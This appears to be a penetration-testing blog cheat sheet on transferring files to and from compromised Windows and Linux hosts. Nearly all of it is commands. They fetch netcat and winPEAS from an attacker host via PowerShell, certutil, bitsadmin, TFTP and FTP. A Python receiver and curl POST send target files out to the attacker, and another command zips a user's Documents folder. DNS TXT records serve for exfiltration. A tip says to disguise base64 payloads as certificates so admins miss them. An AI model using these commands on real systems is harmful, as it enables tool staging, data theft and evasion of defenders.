Important notes
- You have a blind code execution which doesn’t always works? Try to determine if there are some bad characters.
- Outbound ports could be blocked as well. Try to use a port which is open for inbound traffic.
Copy+paste
For Linux:
base64 r > r.b64 ... base64 --decode -i r.b64 > r.tar
For Windows:
base64 p64.exe | sed 's/^(.*)$/echo \1 >> b64/g' ... certutil -encode file.exe b64.txt certutil -decode b64.txt file.exe
Alternative:
python -c "open('test.b64','wb').write(open('test.txt').read().encode('base64'))"
...
python -c "open('test.txt','wb').write(open('test.b64').read().decode('base64'))"
Alternative:
python -m base64 -e test > test.b64 ... python -m base64 -d test
Alternative:
PS> $str=@' multiline string '@ PS> [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($string))
Tipp: Add the following at the first and last line of the b64 encoded payload before transfer so that it looks nicer and no software or admin would see it as strange 🙂
-----BEGIN CERTIFICATE-----
....
-----END CERTIFICATE------
Windows
Wget
powershell wget -Uri http://$attacker/nc.exe -OutFile C:\Windows\Temp\nc.exe
Curl
If curl is installed: Start the following Python script as HTTP receiver:
from http.server import BaseHTTPRequestHandler, HTTPServer
import os
class SimpleHTTPRequestHandler(BaseHTTPRequestHandler):
def do_POST(self):
content_length = int(self.headers['Content-Length'])
file_data = self.rfile.read(content_length)
file_name = self.headers['Filename']
with open(file_name, 'wb') as f:
f.write(file_data)
self.send_response(200)
self.end_headers()
self.wfile.write(b'File uploaded successfully')
do_PUT = do_POST
server_address = ('', 8080)
httpd = HTTPServer(server_address, SimpleHTTPRequestHandler)
httpd.serve_forever()
Then, send the file from the target:
curl -X POST -H "Filename: yourfile.bin" --data-binary "@C:\path\to\yourfile.bin" http://your-linux-server-ip:8080
Certutil
certutil.exe -urlcache -split -f "http://$NTPSRV/file" file
Bitsadmin (deprecated)
bitsadmin /transfer debjob /download /priority normal http://$NTPSRV/beRoot.exe C:\Temp\beRoot.exe
PowerShell
Until Windows 7:
(New-Object System.Net.WebClient).DownloadFile("http://...", "C:\file.exe")
Above Windows 7:
wget http://... .outfile C:\file.exe
Download in PowerShell:
iwr -uri http://$attacker/winPEASx64.exe -Outfile winPEAS.exe
TFTP
- Start tftp service on another host and put files into the configured directory.
- On the target host, download via the command line
Start tftp daemon under Linux
# mkdir /tftp # atftpd --daemon --port 69 /tftp # cp /usr/share/windows-binaries/nc.exe /tftp/
Download under Windows
tftp -i 10.11.0.5 get nc.exe
Notepad, other programs
For text files:
For binary files:
FTP
If there is no interactive session, create a file and use the non-interactive mode:
User anonymous dsfuhdshdsf bin lcd C:\Temp GET nc.exe mput *.* bye
Then, execute the commands
ftp -v -i -n -s:ftp.txt 10.10.10.10 [21]
If this doesn’t work, try to omit the port!
Example for WinXP
echo USER anonymous > ftp.txt echo dsfuhdshdsf >> ftp.txt echo bin >> ftp.txt echo get Taihou32.exe >> ftp.txt echo bye >> ftp.txt ftp -v -i -n -s:ftp.txt 192.168.119.158
Stand-alone FTP server
pip3 install pyftpdlib
python3 -m pyftpdlib -w
SSH
Try to connect back to your SSH server via scp!
Compress files
With PowerShell 5 (Win10), compression is now possible
powershell -exec bypass Compress-Archive -Path C:\Users\alice\Documents\* -DestinationPath a.zip
Or download 7z and use it like follow:
7za.exe a file.7z .
To extract:
7z x file.7z
DNS extraction / infiltration
Use a DNS server to extract or infiltrate data from or into a network.
Infiltration:
- Set a range of TXT records of a domain you own.
- Perform queries like
nslookup -type=txt your-domain.internal
to “import” the external data.
Maybe use also a set of subdomains for all the data. You could also write a script which
- base64’ed a file
- create TXT records for a domain
- and another script, which reads like nslookup in a sequence and rebuilds the base64 information.
Leave a Reply
You must be logged in to post a comment.